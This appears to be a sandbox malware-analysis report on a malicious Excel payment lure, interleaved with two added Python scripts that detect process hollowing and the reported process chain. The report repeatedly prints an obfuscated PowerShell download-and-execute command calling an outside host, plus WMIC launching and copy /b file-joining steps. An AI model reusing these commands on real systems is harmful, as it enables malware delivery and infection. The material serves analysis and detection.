Source: WMIC.exe, 0000001A.00000002.345078681.00000000035D0000.00000004.00000020.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\Default
Found Excel 4.0 Macro with suspicious formulas
Source: Scanned_25526662-Payment.xls Initial sample: EXEC
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory, 27_2_00424D1A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_022100C7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221002C NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_0221002C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221000B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_0221000B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210072 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread, 27_2_02210072
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 29_2_00478772
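The call list attached to 27_2_022100C7 and its siblings (CreateProcessW, then NtUnmapViewOfSection, a fresh NtMapViewOfSection, NtSetContextThread and NtResumeThread) is the classic process-hollowing order. The script below is an added example, not part of the Joe Sandbox report: it parses report lines of this exact "Code function: <id> <calls>, <id>" shape (the three sample lines are copied from this section) and matches each call list against an ordered hollowing pattern. The step sets (which API aliases count for each step) are this example's own assumption, and because the listing comes from static disassembly it records referenced imports in code order, not a confirmed runtime trace.

```python
import re

# Report lines of the form "Code function: <id> <call>,<call>,..., <id>",
# copied from this section (constructed sample input for the example).
REPORT_LINES = [
    "Code function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory, 27_2_00424D1A",
    "Code function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,"
    "NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,"
    "NtResumeThread, 27_2_022100C7",
    "Code function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 29_2_00478772",
]

# Same sequence as 27_2_022100C7, kept as a plain list for direct matching.
REPORTED_TRACE = ["NtCreateSection", "NtMapViewOfSection", "CreateProcessW",
                  "NtGetContextThread", "NtReadVirtualMemory", "NtWriteVirtualMemory",
                  "NtUnmapViewOfSection", "NtMapViewOfSection", "NtSetContextThread",
                  "NtResumeThread"]

# Ordered hollowing pattern; each step is a set of API names that satisfy it.
# The alias sets are an assumption of this example, not taken from the report.
HOLLOWING_STEPS = [
    {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},     # create the target process
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},                   # carve out its original image
    {"NtMapViewOfSection", "NtWriteVirtualMemory", "WriteProcessMemory"},  # place the payload image
    {"NtSetContextThread", "SetThreadContext"},                         # point the thread at the payload
    {"NtResumeThread", "ResumeThread"},                                 # let it run
]

# "<id>" is repeated at the end of the line; the back-reference pins the call list.
LINE_RE = re.compile(r"Code function: (\S+) (.+?),? \1$")


def parse_report_line(line):
    """Return (function_id, [api, api, ...]) for a report line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    func_id, calls = m.group(1), m.group(2)
    return func_id, [c for c in calls.split(",") if c]


def match_ordered(trace, steps):
    """Return the index in `trace` at which each step is satisfied, in order
    (each step must occur after the previous one), or None if no match."""
    positions, start = [], 0
    for step in steps:
        for i in range(start, len(trace)):
            if trace[i] in step:
                positions.append(i)
                start = i + 1
                break
        else:
            return None
    return positions


def is_hollowing(trace):
    return match_ordered(trace, HOLLOWING_STEPS) is not None


def find_hollowing(lines):
    """Function ids from report lines whose call list follows the pattern."""
    hits = []
    for line in lines:
        parsed = parse_report_line(line)
        if parsed and is_hollowing(parsed[1]):
            hits.append(parsed[0])
    return hits


if __name__ == "__main__":
    for func_id in find_hollowing(REPORT_LINES):
        print("hollowing pattern in", func_id)
```

Ordering matters: a trace that unmaps a section before creating the process, or that never resumes the thread, does not match, which keeps ordinary loaders and debuggers out of the hit list. The NtWriteVirtualMemory that precedes the unmap in the report sequence is deliberately not counted as the "place image" step; the report's sequence satisfies that step with the second NtMapViewOfSection.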
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_005C6B10: new,DeviceIoControl, 29_2_005C6B10
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006940D0 29_2_006940D0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006849A0 29_2_006849A0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0040EA7D 29_2_0040EA7D
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004F2AA7 29_2_004F2AA7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0042ABC1 29_2_0042ABC1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068321E 29_2_0068321E
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00411532 29_2_00411532
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004276C4 29_2_004276C4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00689D67 29_2_00689D67
Document contains embedded VBA macros
Source: Scanned_25526662-Payment.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006876A0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006811C5 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006B08FC appears 794 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00411C35 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00680E81 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 006850AE appears 33 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 005CEF10 appears 131 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00411FB1 appears 168 times
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: String function: 00696B06 appears 44 times
PE file does not import any functions
Source: nwaha3c5.dll.21.dr Static PE information: No import functions for PE file found
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Yara signature match
Source: Scanned_25526662-Payment.xls, type: SAMPLE Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: C:\Users\user\Desktop\1BA10000, type: DROPPED Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Test3.jpg.23.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@19/22@1/2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle, 29_2_0045624F
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource, 29_2_004231B3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Mutant created: \Sessions\1\BaseNamedObjects\693cae42864dd7a2e04c35636e49f749
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{BF342920-9C68-4407-BD39-EA487E52A3EE} - OProcSessId.dat Jump to behavior
Source: Scanned_25526662-Payment.xls OLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Scanned_25526662-Payment.xls Virustotal: Detection: 14%
Source: Scanned_25526662-Payment.xls ReversingLabs: Detection: 15%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Data Obfuscation:

PowerShell case anomaly found
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' )) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 29_2_007D5210
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00402F43 pushfd ; iretd 27_2_00402F49
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00682156 push ecx; ret 29_2_00682169
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006B08FC push eax; ret 29_2_006B091A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006B099C push ecx; ret 29_2_006B09AC
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00400F04 push eax; ret 29_2_00400F3F
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068118E push ecx; ret 29_2_006811A1
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0042BBAE push eax; ret 29_2_0042BBAF
Source: initial sample Static PE information: section name: .text entropy: 7.92605680707
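The process chain in this report (EXCEL.EXE spawning cmd.exe, the mixed-case PoWErsHEll and WmIC invocations, csc.exe compiling a response file from %TEMP%, copy /b joining Test1.txt and Test2.gif into Test3.jpg, and WMIC process call create launching a ".jpg") maps directly onto host-based detections. The Python below is an added example, not code from the Joe Sandbox report or from the PowerShell_Case_Anomaly YARA rule it cites: the event records are constructed from the command lines quoted in this report with invented pid/ppid values, the field names are an assumption, the set of "normal" casings is this example's own, and extending the casing check from powershell to wmic and cmd goes beyond what that rule does.

```python
import re
from os.path import splitext

# Constructed process-creation events mirroring this report's chain.
# pid/ppid values are invented; field names are an assumption of this example.
EVENTS = [
    {"pid": 1, "ppid": 0,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))"},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))"},
    {"pid": 4, "ppid": 3, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r"'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'"},
    {"pid": 5, "ppid": 3, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg"},
    {"pid": 6, "ppid": 3, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg"},
    {"pid": 7, "ppid": 6, "image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "cmdline": r"WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg"},
    # Benign control (constructed): normally cased PowerShell launched by a user.
    {"pid": 8, "ppid": 0, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXEC_EXTS = {".exe", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".msi", ".scr"}

# Casings seen in legitimate use (assumption of this example). Any other mix,
# e.g. "PoWErsHEll" or "WmIC", is the obfuscation tell the case-anomaly rule targets.
NORMAL_CASINGS = {
    "powershell": {"powershell", "PowerShell", "POWERSHELL", "Powershell"},
    "wmic": {"wmic", "WMIC", "Wmic"},
    "cmd": {"cmd", "CMD", "Cmd"},
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip("'\"").lower()


def case_anomalies(cmdline):
    """Keywords that appear in the command line with a non-standard casing."""
    hits = []
    for word, normal in NORMAL_CASINGS.items():
        for m in re.finditer(r"\b%s\b" % word, cmdline, flags=re.IGNORECASE):
            if m.group(0) not in normal:
                hits.append(word)
                break
    return hits


def wmic_create_target(cmdline):
    """The path handed to 'wmic process call create', or None."""
    m = re.search(r"\bwmic\b.*\bprocess\b.*\bcall\b.*\bcreate\b\s+(.+)$",
                  cmdline, re.IGNORECASE)
    return m.group(1).strip().strip("'\"") if m else None


def analyse(events):
    """Return (rule_name, pid) findings for the given process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        pid, cmd, img = e["pid"], e["cmdline"], basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if case_anomalies(cmd):
            findings.append(("case_anomaly", pid))
        if img in SHELL_IMAGES and parent and basename(parent["image"]) in OFFICE_IMAGES:
            findings.append(("office_spawns_shell", pid))
        if img == "csc.exe" and re.search(r"\\AppData\\Local\\Temp\\", cmd, re.IGNORECASE):
            findings.append(("csc_from_temp", pid))
        if re.search(r"\bcopy\s+/b\b.*\+", cmd, re.IGNORECASE):
            findings.append(("copy_b_concat", pid))
        target = wmic_create_target(cmd)
        if target:
            findings.append(("wmic_process_create", pid))
            if splitext(target)[1].lower() not in EXEC_EXTS:
                findings.append(("misleading_extension", pid))
    return findings


if __name__ == "__main__":
    for rule, pid in analyse(EVENTS):
        print(f"{rule:22s} pid={pid}  {EVENTS[pid - 1]['cmdline'][:70]}")
```

Run against the constructed events, the control process (pid 8) produces no findings while every stage of the reported chain trips at least one rule. The casing check is the one most likely to survive a URL or file-name change in the next campaign; the parent-child and WMIC rules are what Sigma's "Microsoft Office Product Spawning Windows Shell" and the WMI process-creation signatures in this report express.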

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\Test3.jpg Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
